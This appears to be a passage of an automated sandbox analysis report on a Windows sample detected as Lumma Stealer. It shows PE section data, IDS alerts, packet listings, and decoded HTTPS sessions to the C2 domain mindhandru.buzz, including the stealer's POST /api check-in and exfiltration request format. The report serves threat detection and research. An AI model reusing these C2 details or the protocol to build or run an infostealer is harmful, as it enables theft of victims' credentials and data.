IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	960690cb62460472232e39e277b45570	False	0.9995851205065359	data	7.981882961435573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1ac	0x200	c4249243ceaeb236e3ce8ce2ab2c9a69	False	0.5390625	data	5.249019796122045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x2b2000	0x200	3558b9946726cb0fc4bba012755a73ef	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jvzofgxg	0x307000	0x1a3000	0x1a2200	baa33c52871efcc970a08cd471fc5740	False	0.9946556193946189	data	7.955291479684767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jsezhyer	0x4aa000	0x1000	0x400	ee11bbbba25d0d93fbe83377fdbf0221	False	0.740234375	data	5.936339266781999	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ab000	0x3000	0x2200	4c06587458ddd67b28551e2c9046332d	False	0.10363051470588236	DOS executable (COM)	1.249588131658659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T08:46:28.446417+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49699	104.21.11.101	443	TCP
2024-12-27T08:46:29.286052+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49699	104.21.11.101	443	TCP
2024-12-27T08:46:29.286052+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49699	104.21.11.101	443	TCP
2024-12-27T08:46:30.508950+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	104.21.11.101	443	TCP
2024-12-27T08:46:31.289089+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49700	104.21.11.101	443	TCP
2024-12-27T08:46:31.289089+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49700	104.21.11.101	443	TCP
2024-12-27T08:46:32.913749+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49702	104.21.11.101	443	TCP
2024-12-27T08:46:34.055670+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49702	104.21.11.101	443	TCP
2024-12-27T08:46:35.440185+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49708	104.21.11.101	443	TCP
2024-12-27T08:46:37.713708+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49714	104.21.11.101	443	TCP
2024-12-27T08:46:40.342640+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49720	104.21.11.101	443	TCP
2024-12-27T08:46:43.828737+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49727	104.21.11.101	443	TCP
2024-12-27T08:46:46.916525+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49741	104.21.11.101	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:46:27.151782990 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:27.151832104 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:27.152087927 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:27.155390024 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:27.155406952 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:28.446269035 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:28.446417093 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:28.458045006 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:28.458062887 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:28.458420992 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:28.500988960 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:28.531136990 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:28.531167030 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:28.531280041 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.286068916 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.286166906 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.286236048 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.288254976 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.288285971 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.288578987 CET	49699	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.288593054 CET	443	49699	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.296612978 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.296674013 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:29.296861887 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.297141075 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:29.297164917 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:30.508742094 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:30.508949995 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:30.510412931 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:30.510428905 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:30.510724068 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:30.512104034 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:30.512175083 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:30.512195110 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.289088964 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.289144039 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.289167881 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.289194107 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.289283991 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.289334059 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.295248985 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.295322895 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.295346022 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.303550005 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.303582907 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.303618908 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.303648949 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.303699017 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.311871052 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.353887081 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.408592939 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.412636995 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.412700891 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.412723064 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.463206053 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.481040001 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.484735012 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.484769106 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.484824896 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.484859943 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.484882116 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.484911919 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.484944105 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.485183954 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.485205889 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.485225916 CET	49700	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.485234976 CET	443	49700	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.651917934 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.651962042 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:31.652034998 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.652856112 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:31.652872086 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:32.913616896 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:32.913748980 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:33.141607046 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:33.141628981 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:33.142024040 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:33.146990061 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:33.147176981 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:33.147198915 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:34.055761099 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:34.056061983 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:34.056137085 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:34.056252956 CET	49702	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:34.056279898 CET	443	49702	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:34.180793047 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:34.180819035 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:34.180947065 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:34.181390047 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:34.181402922 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:35.439984083 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:35.440185070 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:35.450329065 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:35.450345039 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:35.450604916 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:35.451984882 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:35.452117920 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:35.452142000 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:35.452187061 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:35.495326996 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:36.255857944 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:36.255953074 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:36.256073952 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:36.256402969 CET	49708	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:36.256417990 CET	443	49708	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:36.446023941 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:36.446083069 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:36.446203947 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:36.446645975 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:36.446661949 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:37.713627100 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:37.713707924 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:37.757225037 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:37.757256031 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:37.758284092 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:37.783607006 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:37.783798933 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:37.783915997 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:37.784012079 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:37.784024000 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:38.750310898 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:38.750422001 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:38.750475883 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:38.750637054 CET	49714	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:38.750650883 CET	443	49714	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:39.083584070 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:39.083633900 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:39.083730936 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:39.084137917 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:39.084160089 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:40.342569113 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:40.342639923 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:40.344233036 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:40.344253063 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:40.344506979 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:40.345873117 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:40.345958948 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:40.345964909 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:42.071600914 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:42.071681976 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:42.071865082 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:42.072406054 CET	49720	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:42.072426081 CET	443	49720	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:42.570002079 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:42.570050001 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:42.570357084 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:42.570760012 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:42.570776939 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.828660011 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.828737020 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.830504894 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.830518007 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.830760002 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.856647968 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857359886 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857397079 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.857489109 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857542038 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.857640028 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857669115 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.857772112 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857804060 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.857935905 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.857980967 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.858118057 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.858149052 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.858160973 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.858277082 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.858315945 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.903331995 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.903474092 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.903517008 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.903532982 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.951342106 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.951494932 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.951534033 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.951560974 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:43.999334097 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:43.999475956 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:44.041472912 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:44.041485071 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:44.218018055 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.317574024 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.317684889 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.317739010 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:46.317873955 CET	49727	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:46.317898989 CET	443	49727	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.328968048 CET	49741	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:46.329021931 CET	443	49741	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.329144955 CET	49741	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:46.329556942 CET	49741	443	192.168.2.7	104.21.11.101
Dec 27, 2024 08:46:46.329576969 CET	443	49741	104.21.11.101	192.168.2.7
Dec 27, 2024 08:46:46.916524887 CET	49741	443	192.168.2.7	104.21.11.101

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:46:26.987349987 CET	60467	53	192.168.2.7	1.1.1.1
Dec 27, 2024 08:46:27.124366999 CET	53	60467	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:46:26.987349987 CET	192.168.2.7	1.1.1.1	0xebe2	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:46:27.124366999 CET	1.1.1.1	192.168.2.7	0xebe2	No error (0)	mindhandru.buzz		104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:46:27.124366999 CET	1.1.1.1	192.168.2.7	0xebe2	No error (0)	mindhandru.buzz		172.67.165.185	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:28 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-27 07:46:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 07:46:29 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jgpvmtllfsicoisf8letla29cn; expires=Tue, 22 Apr 2025 01:33:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sBTzu6nAqz%2BCHwsWlUaNoVT38lmut2f1iZZncueyJgPfC4FezO9v4Z1cS0FKM4DIV9lCeOnuA2RL5C7ndMi2ilrYlFYf%2FX0fKEEhzhX04WgpscIjcXRY2B3NhLXgoIyOKo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b271fd7043e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1710&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1629464&cwnd=247&unsent_bytes=0&cid=40f0b58c21b59a5f&ts=852&x=0"
2024-12-27 07:46:29 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 07:46:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:30 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: mindhandru.buzz
2024-12-27 07:46:30 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 07:46:31 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4at75eamcl4rdrqar9tn34k4fi; expires=Tue, 22 Apr 2025 01:33:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQG78Isx3WQyi85jJgRxQChrwAjEEvemgZphljqlWFeSZbrhM7VPHyXHPg%2BtIF8frt44vNvkVNWuup%2Bvhw77KpfwHHeIgRMS%2F9bi2dQ%2F%2BMNm3eMVspXJvOmmoQ1sxF2c2Wk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b27e6a5942af-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1645&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=946&delivery_rate=1760096&cwnd=166&unsent_bytes=0&cid=e9db656f7572de3a&ts=786&x=0"
2024-12-27 07:46:31 UTC	242	IN	Data Raw: 34 36 38 0d 0a 53 38 45 64 4b 37 2f 64 6e 4c 6b 47 31 76 39 64 4e 55 62 76 70 69 79 78 57 6f 78 4b 79 47 37 6b 75 68 68 72 43 61 50 65 6e 6e 51 77 34 32 73 4a 68 65 6d 77 6d 33 57 7a 33 57 64 42 4e 4a 72 44 41 4a 4d 37 36 47 6a 79 43 49 58 57 61 77 34 6c 67 61 6a 7a 56 6e 47 6e 66 45 66 4d 75 4c 43 62 59 36 37 64 5a 32 34 39 7a 63 4e 43 6b 32 43 75 4c 36 49 4d 68 64 5a 36 43 6d 4c 4d 72 76 49 58 49 36 31 36 51 39 71 2b 2b 4e 68 71 75 35 6f 34 55 43 65 46 79 45 58 63 4d 75 46 6f 35 45 79 42 77 44 70 52 4b 2b 36 37 36 68 55 47 6f 47 35 41 6e 61 43 77 77 69 53 7a 6b 58 38 50 5a 49 37 44 54 74 30 38 36 43 47 67 42 6f 7a 65 65 77 39 6a 30 37 66 34 48 43 4f 6a 65 55 4c 51 74 2b 7a 56 59 4c 79 52 50 6c 6f 6e 7a 59 6f 4f 31 Data Ascii: 468S8EdK7/dnLkG1v9dNUbvpiyxWoxKyG7kuhhrCaPennQw42sJhemwm3Wz3WdBNJrDAJM76GjyCIXWaw4lgajzVnGnfEfMuLCbY67dZ249zcNCk2CuL6IMhdZ6CmLMrvIXI616Q9q++Nhqu5o4UCeFyEXcMuFo5EyBwDpRK+676hUGoG5AnaCwwiSzkX8PZI7DTt086CGgBozeew9j07f4HCOjeULQt+zVYLyRPlonzYoO1
